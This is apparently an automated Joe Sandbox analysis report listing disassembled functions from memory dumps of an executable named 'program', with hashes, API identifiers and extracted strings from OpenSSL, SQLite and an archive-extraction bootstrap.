                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007B6570
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                                                                              • API String ID: 4069847057-1099454403
                                                                                                                                                                                                                                              • Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                              • Instruction ID: 6626caf2ddb98e4c2b14fe5fd6035775ca580d567788023c27e0d9084c1723b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F417131A0AA46D6E711AB15E85077823A0EB48BD4F484536DB4E877BDDF7CF950CB10
                                                                                                                                                                                                                                              Function 00007FFE0137D610 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                              • API String ID: 0-3733955532
                                                                                                                                                                                                                                              • Opcode ID: 88647394fd887147623df4bf723cbe03d19021e636b2fcbf605b74a54c7796be
                                                                                                                                                                                                                                              • Instruction ID: 638fc11925c426d41efb658b63c539dab47b5430d0252f557934ec2a18ff49e2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88647394fd887147623df4bf723cbe03d19021e636b2fcbf605b74a54c7796be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65029961A09B8386EF698FA1A8543B977A0FF85B89F094135DE4E0E6B5DF3CE404C300
                                                                                                                                                                                                                                              Function 00007FFE0133B0C0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFE0133B1C3
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFE0133B2A4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                              • API String ID: 4225454184-875588658
                                                                                                                                                                                                                                              • Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                              • Instruction ID: f266fa446388cb4c1fe4940e6117a835c14fc7514572afc54d0e1492e1e05e12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCE18272F086529AFB21CFA5D4503BC77A1AB04B48F064136DE4E6AAF9DE3CE545C348
                                                                                                                                                                                                                                              Function 00007FFE01357760 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFE013578ED
                                                                                                                                                                                                                                              • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFE0135790F
                                                                                                                                                                                                                                              • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFE01357B14
                                                                                                                                                                                                                                              • Cannot add a PRIMARY KEY column, xrefs: 00007FFE01357881
                                                                                                                                                                                                                                              • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFE013578F7, 00007FFE01357973, 00007FFE01357A81
                                                                                                                                                                                                                                              • Cannot add a UNIQUE column, xrefs: 00007FFE0135789C
                                                                                                                                                                                                                                              • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFE01357C5C
                                                                                                                                                                                                                                              • Cannot add a column with non-constant default, xrefs: 00007FFE01357969
                                                                                                                                                                                                                                              • cannot add a STORED column, xrefs: 00007FFE01357A72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                              • API String ID: 4225454184-200680935
                                                                                                                                                                                                                                              • Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                              • Instruction ID: fe9703f92b979d24d44fd3b9768087eebf42dc778269b59b5bca7b74f1a8e6ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFE1AA62A08B8281EB658B16E5447BA77A1FB44FC8F864135DE8D0BBB9DF3CE551C700
                                                                                                                                                                                                                                              Function 00007FFE00761A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                                                                              • API String ID: 3568877910-1794268454
                                                                                                                                                                                                                                              • Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                              • Instruction ID: a609f79fcf7c490f1a8585a1039a1223843b2bdb569c50758e23c4a207666609
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD911122A1BB8281FA55EF25D4507B83360EF85B48F1C4636EB5D4B369DF3CA5918310
                                                                                                                                                                                                                                              Function 00007FF6B7502180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 22ad40ebae3de3366863d30a60ff3b0a44f7f7b56b0eb5529f86f249ebe4b085
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1051E726608BA186D6349F36E4581BAB7A1F798B65F004125EFDE836A4EF3CD085DB10
                                                                                                                                                                                                                                              Function 00007FF6B75080C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 5366563b7c7873b22ac9c7ec1e089b531d78b2e5d599c86f239c1fcb5f5fc67b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B219223B0CA4282EB458B7EE8545B96361FF88B94F584235DB6DC33F4EE2CE5918341
                                                                                                                                                                                                                                              Function 00007FFDFAE62940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                                              • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                              • Instruction ID: 23d45c6cfb952ff7eef3566c951cbf40ad91b6494df43c4177ee712713469fc5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E81C221F3C24386FB6CBB259470A796690AF95780F4489B5E92F473DEDE3EE8458700
                                                                                                                                                                                                                                              Function 00007FF6B7516290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: c4733eaa1329521d65f513c589a98c92650a635fbfeec5a90d75ea550f6378d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A128163E0C2A386FB205F18D1546B976A1FB50752F888135E78B86EE4DF3CE980CB10
                                                                                                                                                                                                                                              Function 00007FF6B7510FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: ac11f2da6b373fe71ff394aa5867e5bdf766a2b15bf0cee618d3e2b85ee76662
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB129463E0C5A386FB205F1CE05467976A5FB40756F954071D79A86EE8DF7CE980CB00
                                                                                                                                                                                                                                              Function 00007FFE01362070 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                              • API String ID: 4225454184-2846519077
                                                                                                                                                                                                                                              • Opcode ID: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                              • Instruction ID: 40ddfc742e8e1b6d0c38c4cebd2bc01e26aee4a6f4aceab77a8cbc7f33280034
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0502BF62A0878386EB24DF2594107AA77A1FB85FC8F428235DE8D4BBA5DF3CE555C700
                                                                                                                                                                                                                                              Function 00007FF6B7501050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: ebfdd443e66c36c88ce938ee0def13dbb25be8a39f0dedabf99b0800e1494f32
                                                                                                                                                                                                                                              • Instruction ID: d15e8edc4f45c5f271024c7f72dfc8627a41669d215db790b53297602b771fef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebfdd443e66c36c88ce938ee0def13dbb25be8a39f0dedabf99b0800e1494f32
